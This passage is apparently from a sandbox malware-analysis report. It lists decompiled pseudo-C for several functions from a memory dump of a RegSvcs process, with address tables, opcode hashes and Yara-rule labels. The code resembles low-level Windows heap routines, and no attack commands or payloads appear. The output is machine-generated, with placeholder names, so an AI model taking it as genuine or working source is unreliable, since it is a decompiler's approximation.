				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0139CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                          0x013baa1f
                                          0x013baa21
                                          0x013baa23
                                          0x013baa2b
                                          0x013baa30
                                          0x013baa36
                                          0x013baa39
                                          0x013baa42
                                          0x013baa75
                                          0x013baa7a
                                          0x013baa7c
                                          0x013baa7c
                                          0x013baa88
                                          0x013baa8a
                                          0x013baa8f
                                          0x013bab02
                                          0x013bab04
                                          0x013baa99
                                          0x013baaa8
                                          0x013baaaf
                                          0x013baab3
                                          0x013baacc
                                          0x013baad1
                                          0x013baad6
                                          0x013baae0
                                          0x013baaf3
                                          0x013baaf9
                                          0x013baafe
                                          0x013baafe
                                          0x013baaf3
                                          0x013baad6
                                          0x013baab3
                                          0x013bab07
                                          0x013bab0a
                                          0x013bab11
                                          0x013bab23
                                          0x013bab13
                                          0x013bab1c
                                          0x013bab1c
                                          0x013bab2b
                                          0x013bab44
                                          0x013bab44
                                          0x013bab51
                                          0x013bab51
                                          0x013baa44
                                          0x013baa47
                                          0x013baa4c
                                          0x00000000
                                          0x00000000
                                          0x013baa5a
                                          0x013baa64
                                          0x013baa72
                                          0x00000000
                                          0x013baa66
                                          0x013baa66
                                          0x013baa68
                                          0x013baa6a
                                          0x00000000
                                          0x013baa6a

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction ID: 5784690b55ab202ceb129c5c99f89b4e251f5beaa5e3fba87c8b83088ad275cf
                                          • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                          • Instruction Fuzzy Hash: DD31F532F00A056BEB15CB69C885BEFFBBADF80218F054469EA25A7A51EA748D00C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01308A0A Relevance: .1, Instructions: 120COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E01308A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x13ed360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0133B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0130E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x12d1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01321DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01333C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01308999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                          0x01308a0a
                                          0x01308a1c
                                          0x01308a23
                                          0x01308a2e
                                          0x01308a30
                                          0x01308a36
                                          0x01308a3c
                                          0x01308a3e
                                          0x01308a4a
                                          0x01308a52
                                          0x01308a9c
                                          0x01308aae
                                          0x01308a58
                                          0x01308a5e
                                          0x01308a6a
                                          0x01308a6f
                                          0x01308a75
                                          0x01308a7d
                                          0x01308a85
                                          0x01308a86
                                          0x01308a89
                                          0x01308a93
                                          0x01308a99
                                          0x01308a9b
                                          0x00000000
                                          0x01308aaf
                                          0x01308abe
                                          0x01308ac3
                                          0x01308acb
                                          0x01308ad7
                                          0x01308ae0
                                          0x01308af1
                                          0x00000000
                                          0x01308af1
                                          0x01308acd
                                          0x01308ad5
                                          0x01308afb
                                          0x01308afd
                                          0x01308aff
                                          0x01308b07
                                          0x01308b22
                                          0x01308b24
                                          0x01308b2a
                                          0x01308b2e
                                          0x01308b3f
                                          0x01308b78
                                          0x01308b41
                                          0x01308b52
                                          0x01308b54
                                          0x01308b5c
                                          0x01308b74
                                          0x01308b74
                                          0x01308b5c
                                          0x01308b3f
                                          0x01308b5e
                                          0x01308b61
                                          0x01308b64
                                          0x01308b64
                                          0x01308b6c
                                          0x01308b6c
                                          0x01308b11
                                          0x01359cd5
                                          0x01359cd5
                                          0x01308b17
                                          0x01308b1a
                                          0x01308b1a
                                          0x00000000
                                          0x01308ad5
                                          0x01308a89

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c6403512ad6ef315ba6fb644750c0362a99b44fbef86a48a02834cf6b0c4219
                                          • Instruction ID: f2aff63e4703537a9114818ee86cb63da4e543044c3dc66f910802acc3130415
                                          • Opcode Fuzzy Hash: 9c6403512ad6ef315ba6fb644750c0362a99b44fbef86a48a02834cf6b0c4219
                                          • Instruction Fuzzy Hash: FF4162B0E0032D9BDB25DF59C898AAAB7F8FB54308F1045E9D91997692E770DE80CF50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C22AE Relevance: .1, Instructions: 116COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013C22AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E013C21E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x12dac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x12dac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x12dac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x12dac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x13e6110; // 0x7900493f
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x13e6110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E0130FFB0(_t77, _t114, _t114);
						}
						_t63 = E013C2FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E01312280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                                          0x013c22b9
                                          0x013c22c2
                                          0x013c22c6
                                          0x013c22c8
                                          0x013c22d8
                                          0x013c22e2
                                          0x013c2303
                                          0x013c2314
                                          0x013c2321
                                          0x013c234a
                                          0x013c235b
                                          0x013c236c
                                          0x013c2372
                                          0x013c2376
                                          0x013c238f
                                          0x013c238f
                                          0x013c23b4
                                          0x013c23c6
                                          0x013c23c9
                                          0x013c23cc
                                          0x013c23cf
                                          0x013c23cf
                                          0x013c23e9
                                          0x013c23ee
                                          0x013c23f8
                                          0x013c23fb
                                          0x013c23fb
                                          0x013c2403
                                          0x013c240a
                                          0x013c2378
                                          0x013c237b
                                          0x013c2381
                                          0x013c2385
                                          0x013c2385
                                          0x013c238d
                                          0x00000000
                                          0x00000000
                                          0x013c238d
                                          0x013c2376
                                          0x013c2417

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00c35666098df93bc317a1c54d5babd613e3296362f319f39af89f264465e488
                                          • Instruction ID: 3eec33f9ecb8a38aad248df05565be933027be7f4239366f1c237abb5241267a
                                          • Opcode Fuzzy Hash: 00c35666098df93bc317a1c54d5babd613e3296362f319f39af89f264465e488
                                          • Instruction Fuzzy Hash: 484114712043424BC305CF28C8A597BBBE0EF95725F14465DF4D58B2D2CE34D909C7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013BFDE2 Relevance: .1, Instructions: 116COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E013BFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E013BFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E013C0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01317D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E013B1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E013C2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E013BC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E013BDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01317D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E013BA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                          0x013bfde7
                                          0x013bfde8
                                          0x013bfdec
                                          0x013bfdee
                                          0x013bfdf5
                                          0x013bfdf7
                                          0x013bfdfc
                                          0x013bfe19
                                          0x013bfe22
                                          0x013bfe26
                                          0x013bfec6
                                          0x013bfecd
                                          0x013bfed5
                                          0x013bfee7
                                          0x013bfed7
                                          0x013bfee0
                                          0x013bfee0
                                          0x013bfeef
                                          0x013bff00
                                          0x013bff02
                                          0x013bff07
                                          0x013bff07
                                          0x00000000
                                          0x013bfeef
                                          0x013bfe33
                                          0x013bfe55
                                          0x013bfe59
                                          0x013bfe5b
                                          0x013bfe5e
                                          0x013bfe69
                                          0x013bfe6d
                                          0x013bfe6d
                                          0x013bfe69
                                          0x013bfe35
                                          0x013bfe41
                                          0x013bfe41
                                          0x013bfe79
                                          0x013bfe8b
                                          0x013bfe7b
                                          0x013bfe84
                                          0x013bfe84
                                          0x013bfe93
                                          0x00000000
                                          0x013bfea8
                                          0x013bfeba
                                          0x00000000
                                          0x013bfeba
                                          0x013bfdfe
                                          0x013bfe01
                                          0x013bfe02
                                          0x013bfe08
                                          0x013bff0c
                                          0x013bff14
                                          0x013bff14

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction ID: e12b327019f8b0923936476e9777ddb093a933492814fdcec66e270bdfb112e4
                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction Fuzzy Hash: 1D310532200645AFD3229B7CCCC4FBABBADEBC5A58F185059E6498BF42EA74DC41C750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C20A8 Relevance: .1, Instructions: 114COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E013C20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x13e6110; // 0x7900493f
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x13e6110; // 0x7900493f
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E013C2E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x13e6110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E013C2E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x13e6110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E013C2E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x13e6110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x13e6110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                                          0x013c20a8
                                          0x013c20b0
                                          0x013c20b6
                                          0x013c20ba
                                          0x013c20be
                                          0x013c20c4
                                          0x013c20cb
                                          0x013c20db
                                          0x013c20e4
                                          0x013c20e7
                                          0x013c20e9
                                          0x013c20ef
                                          0x013c20f1
                                          0x013c20fe
                                          0x013c2102
                                          0x013c2105
                                          0x013c2105
                                          0x013c2107
                                          0x013c210d
                                          0x013c2112
                                          0x013c2115
                                          0x013c2120
                                          0x013c2120
                                          0x013c2107
                                          0x013c2126
                                          0x013c2131
                                          0x013c2133
                                          0x013c213e
                                          0x013c213e
                                          0x013c2140
                                          0x013c2146
                                          0x013c214b
                                          0x013c2156
                                          0x013c2156
                                          0x013c2140
                                          0x013c215f
                                          0x013c2165
                                          0x013c2170
                                          0x013c2172
                                          0x013c217d
                                          0x013c217d
                                          0x013c217f
                                          0x013c2185
                                          0x013c2192
                                          0x013c2192
                                          0x013c217f
                                          0x013c2170
                                          0x013c2197
                                          0x013c2199
                                          0x013c21a1
                                          0x013c21b1
                                          0x013c21bf
                                          0x013c21d6
                                          0x013c21d6
                                          0x013c21bf
                                          0x013c21dd
                                          0x013c21e5

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f7930e6b01649934a42d5d98347138a30f2c12e57dca2b3fec8051d05b5cf23
                                          • Instruction ID: a12848ce1e1f34ee9f797823c1bc8a613b17e1a510511b5c98a3790d32d2d215
                                          • Opcode Fuzzy Hash: 0f7930e6b01649934a42d5d98347138a30f2c12e57dca2b3fec8051d05b5cf23
                                          • Instruction Fuzzy Hash: A141F673E1012A8BCB28DF68C49157AF7F5FF88708B5602BDD905AB285DB34AD41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013C2D07 Relevance: .1, Instructions: 112COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013C2D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E013C21E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x12dac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x12dac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x12dac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x12dac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x12dac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x12dac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x13e6110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x13e6110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x13e6110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
									goto L6;
								}
							}
						}
						goto L14;
					}
				}
				L14:
				_t29 = _t60 + 4; // 0x4
				return E0130B090(_v24, _t91, _v12, _t29);
			}
























                                          0x013c2d1f
                                          0x013c2d2c
                                          0x013c2d31
                                          0x013c2d33
                                          0x013c2d42
                                          0x013c2d4b
                                          0x013c2d51
                                          0x013c2d5d
                                          0x013c2d62
                                          0x013c2d6e
                                          0x013c2d71
                                          0x013c2d7d
                                          0x013c2d87
                                          0x013c2d8d
                                          0x013c2d91
                                          0x013c2da5
                                          0x013c2db7
                                          0x013c2dc8
                                          0x013c2dcf
                                          0x013c2dd1
                                          0x013c2dd3
                                          0x013c2dd6
                                          0x013c2ddb
                                          0x013c2ddd
                                          0x00000000
                                          0x013c2ddf
                                          0x013c2df5
                                          0x013c2e0e
                                          0x013c2e12
                                          0x013c2e1a
                                          0x013c2e1c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c2e14
                                          0x013c2e16
                                          0x013c2e22
                                          0x013c2e22
                                          0x013c2e18
                                          0x013c2e18
                                          0x00000000
                                          0x013c2e18
                                          0x013c2e16
                                          0x013c2df7
                                          0x013c2df7
                                          0x013c2dfc
                                          0x013c2e04
                                          0x013c2e06
                                          0x013c2e1e
                                          0x013c2e1e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x013c2dfe
                                          0x013c2e00
                                          0x013c2e08
                                          0x013c2e08
                                          0x013c2e02
                                          0x013c2e02
                                          0x00000000
                                          0x013c2e02
                                          0x013c2e00
                                          0x013c2dfc
                                          0x00000000
                                          0x013c2df5
                                          0x013c2ddf
                                          0x013c2e26
                                          0x013c2e26
                                          0x013c2e3c

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4402c8aedbc9fdcb8e62de005d2932958d93a9e615e10343e78caca2d7a1bc5d
                                          • Instruction ID: 730d0cd14b746fbb6e87f74a892cb233bfe222560824c9bb5058d0fa48f613d1
                                          • Opcode Fuzzy Hash: 4402c8aedbc9fdcb8e62de005d2932958d93a9e615e10343e78caca2d7a1bc5d
                                          • Instruction Fuzzy Hash: 274148715002654FC711CF7AC8A1ABBBFF5EF85215B1981AAD885EB282DA34D906C770
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013BEA55 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E013BEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01312280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E013BE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E012FF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0130FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E013BAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E013BBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01317D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E013AFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0130FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E013BA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                          0x013bea55
                                          0x013bea66
                                          0x013bea68
                                          0x013bea6c
                                          0x013bea6f
                                          0x013bea72
                                          0x013bea75
                                          0x013bea7a
                                          0x013bea7a
                                          0x013bea7e
